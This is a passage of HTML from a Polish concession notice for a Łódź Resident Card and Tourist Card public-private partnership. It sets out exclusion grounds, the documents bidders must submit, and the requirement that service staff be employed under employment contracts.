koncesji&#160;&#160;<span id="ctl00_ContentPlaceHolder1_podstawa_art_32_1_4">Tak</span><br /> podstawa wykluczenia określona w art. 32 ust. 1 pkt 5 ustawy o umowie koncesji&#160;&#160;<span id="ctl00_ContentPlaceHolder1_podstawa_art_32_1_5">Tak</span><br /> podstawa wykluczenia określona w art. 32 ust. 1 pkt 6 ustawy o umowie koncesji&#160;&#160;<span id="ctl00_ContentPlaceHolder1_podstawa_art_32_1_6">Tak</span><br /> podstawa wykluczenia określona w art. 32 ust. 1 pkt 7 ustawy o umowie koncesji&#160;&#160;<span id="ctl00_ContentPlaceHolder1_podstawa_art_32_1_7">Tak</span><br /> podstawa wykluczenia określona w art. 32 ust. 1 pkt 8 ustawy o umowie koncesji&#160;&#160;<span id="ctl00_ContentPlaceHolder1_podstawa_art_32_1_8">Tak</span><br /> podstawa wykluczenia określona w art. 32 ust. 1 pkt 9 ustawy o umowie koncesji&#160;&#160;<span id="ctl00_ContentPlaceHolder1_podstawa_art_32_1_9">Tak</span><br /> podstawa wykluczenia określona w art. 32 ust. 1 pkt 10 ustawy o umowie koncesji &#160;&#160;<span id="ctl00_ContentPlaceHolder1_podstawa_art_32_1_10">Tak</span> </div> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <b>III.2.2 Podstawy wykluczenia określone w art. 32 ust. 2 ustawy o umowie koncesji</b> <br/> <b>Zamawiający przewiduje wykluczanie wykonawców z postępowania o zawarcie umowy koncesji na podstawie art. 32 ust. 2 ustawy o umowie koncesji</b><span id="ctl00_ContentPlaceHolder1_czy_podstawy_wykluczenia_III_2_2">Tak</span> <br /> Podstawy, w oparciu o które wykonawcy będą wykluczani z postępowania <i> (należy wypełnić w przypadku, gdy zamawiający przewiduje wykluczanie wykonawców w oparciu o podstawy wykluczenia określone w art. 32 ust. 2 ustawy o umowie koncesji)</i>: <br />podstawa wykluczenia określona w art. 32 ust. 2 pkt 1 ustawy o umowie koncesji &#160;&#160;<span id="ctl00_ContentPlaceHolder1_podstawa_art_32_2_1">Tak</span><br /> podstawa wykluczenia określona w art. 32 ust. 2 pkt 2 ustawy o umowie koncesji &#160;&#160;<span id="ctl00_ContentPlaceHolder1_podstawa_art_32_2_2">Nie</span><br /> podstawa wykluczenia określona w art. 32 ust. 2 pkt 3 ustawy o umowie koncesji &#160;&#160;<span id="ctl00_ContentPlaceHolder1_podstawa_art_32_2_3">Nie</span><br /> podstawa wykluczenia określona w art. 32 ust. 2 pkt 4 ustawy o umowie koncesji &#160;&#160;<span id="ctl00_ContentPlaceHolder1_podstawa_art_32_2_4">Nie</span><br /> podstawa wykluczenia określona w art. 32 ust. 2 pkt 5 ustawy o umowie koncesji &#160;&#160;<span id="ctl00_ContentPlaceHolder1_podstawa_art_32_2_5">Nie</span><br /> podstawa wykluczenia określona w art. 32 ust. 2 pkt 6 ustawy o umowie koncesji &#160;&#160;<span id="ctl00_ContentPlaceHolder1_podstawa_art_32_2_6">Nie</span><br /> podstawa wykluczenia określona w art. 32 ust. 2 pkt 7 ustawy o umowie koncesji &#160;&#160;<span id="ctl00_ContentPlaceHolder1_podstawa_art_32_2_7">Nie</span><br /> podstawa wykluczenia określona w art. 32 ust. 2 pkt 8 ustawy o umowie koncesji &#160;&#160;<span id="ctl00_ContentPlaceHolder1_podstawa_art_32_2_8">Nie</span> </div> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <b>III.2.3 Podstawy wykluczenia podwykonawców</b> <br/> <b>Zamawiający przewiduje zastosowanie podstaw wykluczenia przewidzianych dla wykonawców także do bezpośrednich podwykonawców koncesjonariusza </b><span id="ctl00_ContentPlaceHolder1_czy_podstawy_III_2_3_bezp_podwyk">Nie</span> <br /> <b>Zamawiający przewiduje zastosowanie podstaw wykluczenia przewidzianych dla wykonawców także do dalszych podwykonawców koncesjonariusza</b><span id="ctl00_ContentPlaceHolder1_czy_podstawy_III_2_3_dalszych_podwyk">Nie</span> </div> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <br/> <b>III.2.4 Informacje dodatkowe</b><i>(jeżeli dotyczy)</i>: <br /> <span id="ctl00_ContentPlaceHolder1_informacje_dodatkowe_III_2_4"></span> <br /> </div> </div> <div class="headerLarge_xforms" style="text-align: center"> <u> III.3 DOKUMENTY ŻĄDANE PRZEZ ZAMAWIAJĄCEGO NA POTWIERDZENIE SPEŁNIANIA KRYTERIÓW KWALIFIKACJI ORAZ BRAKU PODSTAW WYKLUCZENIA I WYMAGANIA ZWIĄZANE ZE SKŁADANYMI DOKUMENTAMI </u> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <br/> <b>III.3.1 Wymagania związane ze składaniem oświadczenia o spełnianiu kryteriów kwalifikacji oraz braku podstaw wykluczenia:</b>: <br /> <span id="ctl00_ContentPlaceHolder1_dokumenty_III_3_1">W celu wykazania braku podstaw do wykluczenia z Postępowania w okolicznościach, o których mowa w 32 ust. 1 pkt 1-10 oraz w art. 32 ust. 2 pkt 1 Ustawy o umowie koncesji, Podmiot Publiczny żąda od Wykonawców przedłożenia następujących dokumentów:1.1. oświadczenie o braku podstaw do wykluczenia z postępowania w zakresie określonym w 32 ust. 1 pkt 1-10 oraz w art. 32 ust. 2 pkt 1 Ustawy o umowie koncesji;1.2. informację z Krajowego Rejestru Karnego w zakresie określonym w art. 32 ust. 1 pkt 1, 2 i 9 Ustawy o umowie koncesji wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu złożenia Wniosków;1.3. odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu potwierdzenia braku podstaw wykluczenia na podstawie art. 32 ust. 2 pkt 1 Ustawy o umowie koncesji, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu złożenia Wniosków.1.4. zaświadczenia właściwego naczelnika urzędu skarbowego potwierdzającego, że Wykonawca nie zalega z opłacaniem podatków, wystawionego nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w Postępowaniu, lub innego dokumentu potwierdzającego, że Wykonawca zawarł porozumienie z właściwym organem podatkowym w sprawie spłat tych należności wraz z ewentualnymi odsetkami lub grzywnami, w szczególności uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu;1.5. zaświadczenia właściwej terenowej jednostki organizacyjnej Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego albo innego dokumentu potwierdzającego, że Wykonawca nie zalega z opłacaniem składek na ubezpieczenia społeczne lub zdrowotne, wystawionego nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w Postępowaniu, lub innego dokumentu potwierdzającego, że Wykonawca zawarł porozumienie z właściwym organem w sprawie spłat tych należności wraz z ewentualnymi odsetkami lub grzywnami, w szczególności uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu;1.6. oświadczenia Wykonawcy o braku wydania wobec niego prawomocnego wyroku sądu lub ostatecznej decyzji administracyjnej o zaleganiu z uiszczaniem podatków, opłat lub składek na ubezpieczenia społeczne lub zdrowotne albo - w przypadku wydania takiego wyroku lub decyzji - dokumentów potwierdzających dokonanie płatności tych należności wraz z ewentualnymi odsetkami lub grzywnami lub zawarcie wiążącego porozumienia w sprawie spłat tych należności;1.7. oświadczenia Wykonawcy o braku orzeczenia wobec niego tytułem środka zapobiegawczego zakazu ubiegania się o zamówienia publiczne.2. Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast dokumentów, o których mowa w ust. 1 pkt 1.2. i 1.32) powyżej, potwierdzających brak podstaw wykluczenia Wykonawcy, składa:2.1. ad Pkt 1.2. - informację z odpowiedniego rejestru albo, w przypadku braku takiego rejestru, inny równoważny dokument wydany przez właściwy organ sądowy lub administracyjny kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania lub miejsce zamieszkania ma osoba, której dotyczy informacja albo dokument, w zakresie określonym w art. 32 ust. 1 pkt 1, 2 i 9 Ustawy o umowie koncesji, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania Wniosków;2.2. ad Pkt 1.3. - 1.5.) - dokument lub dokumenty wystawione w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że nie otwarto jego likwidacji ani nie ogłoszono upadłości, wystawiony/wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania Wniosków;2.3. Jeżeli w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania lub miejsce zamieszkania ma osoba, której dokument dotyczy, nie wydaje się dokumentów, o których mowa powyżej, zastępuje się je dokumentem zawierającym odpowiednio oświadczenie Wykonawcy, ze wskazaniem osoby albo osób uprawnionych do jego reprezentacji, lub oświadczenie osoby, której dokument miał dotyczyć, złożone przed notariuszem lub przed organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego właściwym ze względu na siedzibę lub miejsce zamieszkania Wykonawcy lub miejsce zamieszkania tej osoby.3. Podmiot Publiczny zgodnie z art. 32 ust. 7 Ustawy o umowie koncesji, wyklucza Wykonawcę na każdym etapie postępowania o zawarcie umowy koncesji, jeżeli okaże się, że zachodzą wobec niego podstawy wykluczenia. W związku z powyższym Podmiot Publiczny zastrzega możliwość wezwania Wykonawców – na każdym etapie postępowania – do złożenia wszystkich lub niektórych oświadczeń lub dokumentów potwierdzających, że nie podlegają wykluczeniu.4. W celu potwierdzenia spełniania przez Podmiot Prywatny kryteriów kwalifikacji w zakresie sytuacji ekonomicznej lub finansowej określonej w pkt 5.3.2.1. ust. 2 ppkt. 2.2. Opisu Postępowania, Podmiot Publiczny żąda od Wykonawców przedłożenia następujących dokumentów:1) oświadczenie o spełnianiu kryteriów kwalifikacji (formularz stanowi załącznik do Opisu Postępowania);2) informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową Wykonawcy, w okresie nie wcześniejszym niż 1 miesiąc przed upływem terminu składania Wniosków.5. W celu potwierdzenia spełniania przez Wykonawcę kryteriów kwalifikacji w zakresie zdolności technicznej określonej w pkt 5.3.2.1. ust. 2 ppkt. 2.1. Opisu Postępowania, Podmiot Publiczny żąda od Wykonawców przedłożenia następujących dokumentów:1) oświadczenie o spełnianiu kryteriów kwalifikacji (formularz stanowi załącznik do Opisu Postępowania);2) wykaz usług wykonanych nie wcześniej niż w okresie ostatnich 5 lat przed upływem terminu składania Wniosków, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju, daty, miejsca wykonania i podmiotów, na rzecz których usługi te zostały wykonane, z załączeniem dowodów określających czy te usługi zostały wykonane należycie, w szczególności informacji o tym czy usługi zostały wykonane prawidłowo, przy czym dowodami, o których mowa, są poświadczenia bądź inne dokumenty wystawione przez podmiot, na rzecz którego usługi były wykonywane, a jeżeli z uzasadnionej przyczyny o obiektywnym charakterze Partner Prywatny nie jest w stanie uzyskać tych dokumentów - oświadczenie wykonawcy (formularz stanowi załącznik do Opisu Postępowania – Wykaz doświadczenia zawodowego);W przypadku, gdy Podmiot Publiczny jest podmiotem, na rzecz, którego usługi wskazane w wykazie, o którym mowa powyżej, zostały wcześniej wykonane, Wykonawca nie ma obowiązku przedkładania dowodów, o których mowa powyżej. W przypadku korzystania z potencjału podmiotu trzeciego w celu spełnienia kryteriów kwalifikacji Partner Prywatny zobowiązany jest załączyć zobowiązanie podmiotu udostępniającego swoje zasoby na potrzeby Wykonawcy składającego ofertę, – jeśli dotyczy.W celu oceny, czy wykonawca będzie dysponował niezbędnymi zasobami w stopniu umożliwiającym należyte wykonanie umowy koncesji oraz oceny, czy stosunek łączący wykonawcę z tymi podmiotami gwarantuje rzeczywisty dostęp do ich zasobów, ww. dokument, winien określać w szczególności:· zakres dostępnych wykonawcy zasobów innego podmiotu;· sposób wykorzystania zasobów innego podmiotu, przez wykonawcę, przy wykonywaniu zamówienia publicznego;· zakres i okres udziału innego podmiotu przy wykonywaniu zamówienia publicznego;· czy podmiot, na zdolnościach, którego wykonawca polega w odniesieniu do warunków udziału w postępowaniu dotyczących wykształcenia, kwalifikacji zawodowych lub doświadczenia, zrealizuje usługi, których wskazane zdolności dotyczą.6. W celu potwierdzenia spełniania przez Podmiot Prywatny kryteriów selekcji w zakresie ograniczenia liczby wykonawców zaproszonych do udziału w postępowaniu o zawarcie umowy o ppp w pkt 5.3.2.4. ust. 2 ppkt. 2.1. Opisu Postępowania, Podmiot Publiczny żąda od Wykonawców przedłożenia następujących dokumentów:1)	Wykaz punktów/ centrów informacji turystycznej certyfikowanych przez Polską Organizację Turystyczną (formularz stanowi załącznik do Opisu Postępowania- wykazów punktów/ centrów)2)	Wykaz dodatkowych wdrożeń analogicznego systemu dla miast, o których mowa w rozdziale 5, punkt 5.3.2.1, ust. 2.1 (formularz stanowi załącznik do Opisu Postępowania- wykaz dodatkowych wdrożeń) </span> <br /> </div> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <br/> <b>III.3.2 Wykaz dokumentów, ich zakres oraz sposób składania dokumentów na potwierdzenie spełniania kryteriów kwalifikacji:</b>: <br /> <span id="ctl00_ContentPlaceHolder1_dokumenty_III_3_2">W celu potwierdzenia spełniania przez Podmiot Prywatny kryteriów kwalifikacji w zakresie sytuacji ekonomicznej lub finansowej określonej w pkt 5.3.2.1. ust. 2 ppkt. 2.2. Opisu Postępowania, Podmiot Publiczny żąda od Wykonawców przedłożenia następujących dokumentów:1) oświadczenie o spełnianiu kryteriów kwalifikacji (formularz stanowi załącznik do Opisu Postępowania);2) informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową Wykonawcy, w okresie nie wcześniejszym niż 1 miesiąc przed upływem terminu składania Wniosków.5. W celu potwierdzenia spełniania przez Wykonawcę kryteriów kwalifikacji w zakresie zdolności technicznej określonej w pkt 5.3.2.1. ust. 2 ppkt. 2.1. Opisu Postępowania, Podmiot Publiczny żąda od Wykonawców przedłożenia następujących dokumentów:1) oświadczenie o spełnianiu kryteriów kwalifikacji (formularz stanowi załącznik do Opisu Postępowania);2) wykaz usług wykonanych nie wcześniej niż w okresie ostatnich 5 lat przed upływem terminu składania Wniosków, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju, daty, miejsca wykonania i podmiotów, na rzecz których usługi te zostały wykonane, z załączeniem dowodów określających czy te usługi zostały wykonane należycie, w szczególności informacji o tym czy usługi zostały wykonane prawidłowo, przy czym dowodami, o których mowa, są poświadczenia bądź inne dokumenty wystawione przez podmiot, na rzecz którego usługi były wykonywane, a jeżeli z uzasadnionej przyczyny o obiektywnym charakterze Partner Prywatny nie jest w stanie uzyskać tych dokumentów - inne dokumenty (formularz stanowi załącznik do Opisu Postępowania – Wykaz doświadczenia zawodowego);W przypadku, gdy Podmiot Publiczny jest podmiotem, na rzecz, którego usługi wskazane w wykazie, o którym mowa powyżej, zostały wcześniej wykonane, Wykonawca nie ma obowiązku przedkładania dowodów, o których mowa powyżej. W przypadku korzystania z potencjału podmiotu trzeciego w celu spełnienia kryteriów kwalifikacji Partner Prywatny zobowiązany jest załączyć oryginał zobowiązania podmiotu udostępniającego swoje zasoby na potrzeby Wykonawcy składającego ofertę, – jeśli dotyczy.W celu oceny, czy wykonawca będzie dysponował niezbędnymi zasobami w stopniu umożliwiającym należyte wykonanie umowy koncesji oraz oceny, czy stosunek łączący wykonawcę z tymi podmiotami gwarantuje rzeczywisty dostęp do ich zasobów, ww. dokument, winien określać w szczególności:· zakres dostępnych wykonawcy zasobów innego podmiotu;· sposób wykorzystania zasobów innego podmiotu, przez wykonawcę, przy wykonywaniu zamówienia publicznego;· zakres i okres udziału innego podmiotu przy wykonywaniu zamówienia publicznego;· czy podmiot, na zdolnościach, którego wykonawca polega w odniesieniu do warunków udziału w postępowaniu dotyczących wykształcenia, kwalifikacji zawodowych lub doświadczenia, zrealizuje roboty budowlane, których wskazane zdolności dotyczą.</span> <br /> </div> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <br/> <b>IIII.3.3 Wykaz dokumentów, ich zakres oraz sposób składania dokumentów na potwierdzenie braku podstaw wykluczenia:</b>: <br /> <span id="ctl00_ContentPlaceHolder1_dokumenty_III_3_3">W celu wykazania braku podstaw do wykluczenia z Postępowania w okolicznościach, o których mowa w 32 ust. 1 pkt 1-10 oraz w art. 32 ust. 2 pkt 1 Ustawy o umowie koncesji, Podmiot Publiczny żąda od Wykonawców przedłożenia następujących dokumentów:1.1. oświadczenie o braku podstaw do wykluczenia z postępowania w zakresie określonym w 32 ust. 1 pkt 1-10 oraz w art. 32 ust. 2 pkt 1 Ustawy o umowie koncesji;1.2. informację z Krajowego Rejestru Karnego w zakresie określonym w art. 32 ust. 1 pkt 1, 2 i 9 Ustawy o umowie koncesji wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu złożenia Wniosków;1.3. odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu potwierdzenia braku podstaw wykluczenia na podstawie art. 32 ust. 2 pkt 1 Ustawy o umowie koncesji, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu złożenia Wniosków.1.4. zaświadczenia właściwego naczelnika urzędu skarbowego potwierdzającego, że Wykonawca nie zalega z opłacaniem podatków, wystawionego nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w Postępowaniu, lub innego dokumentu potwierdzającego, że Wykonawca zawarł porozumienie z właściwym organem podatkowym w sprawie spłat tych należności wraz z ewentualnymi odsetkami lub grzywnami, w szczególności uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu;1.5. zaświadczenia właściwej terenowej jednostki organizacyjnej Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego albo innego dokumentu potwierdzającego, że Wykonawca nie zalega z opłacaniem składek na ubezpieczenia społeczne lub zdrowotne, wystawionego nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w Postępowaniu, lub innego dokumentu potwierdzającego, że Wykonawca zawarł porozumienie z właściwym organem w sprawie spłat tych należności wraz z ewentualnymi odsetkami lub grzywnami, w szczególności uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu;1.6. oświadczenia Wykonawcy o braku wydania wobec niego prawomocnego wyroku sądu lub ostatecznej decyzji administracyjnej o zaleganiu z uiszczaniem podatków, opłat lub składek na ubezpieczenia społeczne lub zdrowotne albo - w przypadku wydania takiego wyroku lub decyzji - dokumentów potwierdzających dokonanie płatności tych należności wraz z ewentualnymi odsetkami lub grzywnami lub zawarcie wiążącego porozumienia w sprawie spłat tych należności;1.7. oświadczenia Wykonawcy o braku orzeczenia wobec niego tytułem środka zapobiegawczego zakazu ubiegania się o zamówienia publiczne.2. Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast dokumentów, o których mowa w ust. 1 pkt 1.2. i 1.32) powyżej, potwierdzających brak podstaw wykluczenia Wykonawcy, składa:2.1. ad Pkt 1.2. - informację z odpowiedniego rejestru albo, w przypadku braku takiego rejestru, inny równoważny dokument wydany przez właściwy organ sądowy lub administracyjny kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania lub miejsce zamieszkania ma osoba, której dotyczy informacja albo dokument, w zakresie określonym w art. 32 ust. 1 pkt 1, 2 i 9 Ustawy o umowie koncesji, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania Wniosków;2.2. ad Pkt 1.3. - 1.5.) - dokument lub dokumenty wystawione w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że nie otwarto jego likwidacji ani nie ogłoszono upadłości, wystawiony/wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania Wniosków;2.3. Jeżeli w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania lub miejsce zamieszkania ma osoba, której dokument dotyczy, nie wydaje się dokumentów, o których mowa powyżej, zastępuje się je dokumentem zawierającym odpowiednio oświadczenie Wykonawcy, ze wskazaniem osoby albo osób uprawnionych do jego reprezentacji, lub oświadczenie osoby, której dokument miał dotyczyć, złożone przed notariuszem lub przed organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego właściwym ze względu na siedzibę lub miejsce zamieszkania Wykonawcy lub miejsce zamieszkania tej osoby.</span> <br /> </div> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <br/> <b>III.3.4 Informacje dodatkowe</b><i>(jeżeli dotyczy)</i>: <br /> <span id="ctl00_ContentPlaceHolder1_informacje_dodatkowe_III_3_4">W PRZYPADKU ZŁOŻENIA WW. DOKUMENTÓW W FORMIE PISEMNEJW przypadku złożenia dokumentów, o których mowa w rozporządzeniach Ministra Rozwoju z dnia 26 lipca 2016 r. w sprawie rodzajów dokumentów, jakich może żądać zamawiający od wykonawcy w postępowaniu o udzielenie zamówienia i Ministra Przedsiębiorczości i Technologii z dnia 16 października 2018 r. zmieniającym rozporządzenie w sprawie rodzajów dokumentów, jakich może żądać zamawiający od wykonawcy w postępowaniu o udzielenie zamówienia w formie pisemnej dokumenty te składane są w oryginale lub kopii poświadczonej za zgodność z oryginałem.</span> <br /> </div> </div> <div class="headerLarge_xforms" style="text-align: center"> <u> III.4 INNE DOKUMENTY </u> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <br /> <span id="ctl00_ContentPlaceHolder1_inne_dokumenty_III_4"></span> <br /> </div> </div> <div class="headerLarge_xforms" style="text-align: center"> <u> III.5 WYMAGANIA ZWIĄZANE Z REALIZACJĄ PRZEDMIOTU UMOWY KONCESJI </u> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <br /> <b>III.5.1 Minimalne wymagania</b><i>(jeżeli dotyczy)</i>: <br /> <span id="ctl00_ContentPlaceHolder1_wymagania_III_5_1">Przewiduje się, iż umowa o ppp “Wybór partnera prywatnego do realizacji przedsięwzięcia polegającego na uruchomieniu i obsłudze systemu Karty Mieszkańca i Karty Turysty dla Miasta Łodzi” zostanie zawarta na okres nie dłuższy niż 10 lat od dnia podpisania umowy. Partner Publiczny określa, zgodnie z art. 26 ust. 6 Ustawy o umowie koncesji, wymóg zatrudnienia przez Partnera Prywatnego lub podwykonawcę na podstawie umowy o pracę osób wykonujących wskazane przez Partnera Publicznego czynności w zakresie realizacji umowy koncesji, jeżeli wykonanie tych czynności polega na wykonywaniu pracy w sposób określony w art. 22 § 1 ustawy z dnia 26 czerwca 1974 r. - Kodeks pracy (t.j. Dz. U. z 2019 r., poz. 1540 ze zm.) w następujący sposób: Sposób dokumentowania zatrudnienia osóbPartner Prywatny/podwykonawca prowadzi dokumentację zatrudnienia osób na umowę o pracę zgodnie z obowiązującymi w tym zakresie przepisami prawa. Podmiot Prywatny, którego oferta zostanie wybrana jako najkorzystniejsza, zobowiązany jest najpóźniej w dniu podpisania umowy, do złożenia Partnerowi Publicznemu pisemnego oświadczenia, że osoby odpowiedzialne za pełną obsługę w tym m.in za wydawanie i aktywowanie Karty Mieszkańca i Karty Turysty będą zatrudnione przez Partnera Prywatnego lub podwykonawcę na podstawie umowy o pracę. W przypadku, gdy nastąpi zmiana informacji objętych ww. oświadczeniem, koncesjonariusz (Partner Prywatny) lub podwykonawca jest zobowiązany do niezwłocznego zaktualizowania tego oświadczenia nie później niż w ciągu 3 dni roboczych. Uprawnienia Podmiotu Publicznego w zakresie kontroli spełniania przez koncesjonariusza (Partnera Prywatnego) wymagań, o których mowa w art. 26 ust. 6 Ustawy o umowie koncesji, oraz sankcji z tytułu niespełnienia tych wymagańPodmiot Publiczny zastrzega sobie prawo do wglądu do umów o pracę osób wskazanych w załączniku do oferty z zachowaniem zasad wynikających z przepisów rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE oraz z innymi przepisami prawa powszechnie obowiązującego, które chronią prawa osób, których dane dotyczą.Podmiotowi Publicznemu przysługuje prawo (w trakcie trwania umowy) do wezwania Partnera Prywatnego do wykazania, że w realizacji przedmiotu zamówienia udział biorą osoby zatrudnione na podstawie umowy o pracę - wskazane w oświadczeniu będącym załącznikiem do oferty Wykonawcy.Partner prywatny zobowiązany jest do niezwłocznego pisemnego udzielenia odpowiedzi na wezwanie Podmiotu Publicznego, w szczególności przedstawiając dowody, że w realizacji przedmiotu zamówienia faktycznie udział biorą osoby zatrudnione na podstawie umowy o pracę - wskazane w oświadczeniu będącym załącznikiem do oferty Partnera Prywatnego.W przypadku niespełnienia wymagań, o których mowa w art. 26 ust. 6 Ustawy o umowie koncesji przez Partnera Prywatnego lub podwykonawcę, Podmiot Publiczny przewiduje naliczenie kary umownej, na warunkach określonych w Umowie.Rodzaje czynności niezbędnych do realizacji umowy koncesji, których dotyczą wymagania zatrudnienia przez Partnera Prywatnego lub podwykonawcę na podstawie umowy o pracę osób wykonujących wskazane czynności w zakresie realizacji umowy Podmiot Publiczny wymaga aby wszystkie osoby odpowiedzialne za pełną obsługę w tym m.in. za wydawanie i aktywowanie Karty Mieszkańca i Karty Turysty będących przedmiotem umowy koncesji, których wykonanie polega na wykonywaniu pracy w sposób określony w art. 22 § 1 Kodeksu pracy, były wykonywane przez osoby zatrudnione przez Partnera Prywatnego lub podwykonawcę na podstawie umowy o pracę. Zgodnie z art. 22 § 1 Kodeksu pracy, przez nawiązanie stosunku pracy pracownik zobowiązuje się do wykonywania pracy określonego rodzaju na rzecz pracodawcy i pod jego kierownictwem oraz w miejscu i czasie wyznaczonym przez pracodawcę, a pracodawca - do zatrudniania pracownika za wynagrodzeniem.Partner Prywatny lub podwykonawca zatrudni wyżej wymienione osoby na co najmniej okres udziału przez nie w realizacji koncesji.</span> <br /> </div> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <br /> <b>III.5.2 Realizacja przedmiotu umowy koncesji jest zastrzeżona przepisami ustawowymi lub administracyjnymi dla określonych zawodów </b><i>(dotyczy umowy koncesji na usługi)</i>:&#160;&#160;<span id="ctl00_ContentPlaceHolder1_czy_III_5_2">Nie</span> <br /> Wykaz aktów prawnych, z których wynika zastrzeżenie: <br /> <span id="ctl00_ContentPlaceHolder1_III_5_2"></span> <br /> </div> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <br /> <b>III.5.3 Wymagania związane z realizacją umowy koncesji </b><i>(jeżeli dotyczy)</i> <br /> <span id="ctl00_ContentPlaceHolder1_III_5_3">Partner Publiczny określa, zgodnie z art. 26 ust. 6 Ustawy o umowie koncesji, wymóg zatrudnienia przez Partnera Prywatnego lub podwykonawcę na podstawie umowy o pracę osób wykonujących wskazane przez Partnera Publicznego czynności w zakresie realizacji umowy koncesji, jeżeli wykonanie tych czynności polega na wykonywaniu pracy w sposób określony w art. 22 § 1 ustawy z dnia 26 czerwca 1974 r. - Kodeks pracy (t.j. Dz. U. z 2019 r., poz. 1540 ze zm.) w następujący sposób: Sposób dokumentowania zatrudnienia osóbPartner Prywatny/podwykonawca prowadzi dokumentację zatrudnienia osób na umowę o pracę zgodnie z obowiązującymi w tym zakresie przepisami prawa. Podmiot Prywatny, którego oferta zostanie wybrana jako najkorzystniejsza, zobowiązany jest najpóźniej w dniu podpisania umowy, do złożenia Partnerowi Publicznemu pisemnego oświadczenia, że osoby odpowiedzialne za pełną obsługę w tym m.in za wydawanie i aktywowanie Karty Mieszkańca i Karty Turysty będą zatrudnione przez Partnera Prywatnego lub podwykonawcę na podstawie umowy o pracę. W przypadku, gdy nastąpi zmiana informacji objętych ww. oświadczeniem, koncesjonariusz (Partner Prywatny) lub podwykonawca jest zobowiązany do niezwłocznego zaktualizowania tego oświadczenia nie później niż w ciągu 3 dni roboczych. Uprawnienia Podmiotu Publicznego w zakresie kontroli spełniania przez koncesjonariusza (Partnera Prywatnego) wymagań, o których mowa w art. 26 ust. 6 Ustawy o umowie koncesji, oraz sankcji z tytułu niespełnienia tych wymagańPodmiot Publiczny zastrzega sobie prawo do wglądu do umów o pracę osób wskazanych w załączniku do oferty z zachowaniem zasad wynikających z przepisów rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE oraz z innymi przepisami prawa powszechnie obowiązującego, które chronią prawa osób, których dane dotyczą.Podmiotowi Publicznemu przysługuje prawo (w trakcie trwania umowy) do wezwania Partnera Prywatnego do wykazania, że w realizacji przedmiotu zamówienia udział biorą osoby zatrudnione na podstawie umowy o pracę - wskazane w oświadczeniu będącym załącznikiem do oferty Wykonawcy.Partner prywatny zobowiązany jest do niezwłocznego pisemnego udzielenia odpowiedzi na wezwanie Podmiotu Publicznego, w szczególności przedstawiając dowody, że w realizacji przedmiotu zamówienia faktycznie udział biorą osoby zatrudnione na podstawie umowy o pracę - wskazane w oświadczeniu będącym załącznikiem do oferty Partnera Prywatnego.W przypadku niespełnienia wymagań, o których mowa w art. 26 ust. 6 Ustawy o umowie koncesji przez Partnera Prywatnego lub podwykonawcę, Podmiot Publiczny przewiduje naliczenie kary umownej, na warunkach określonych w 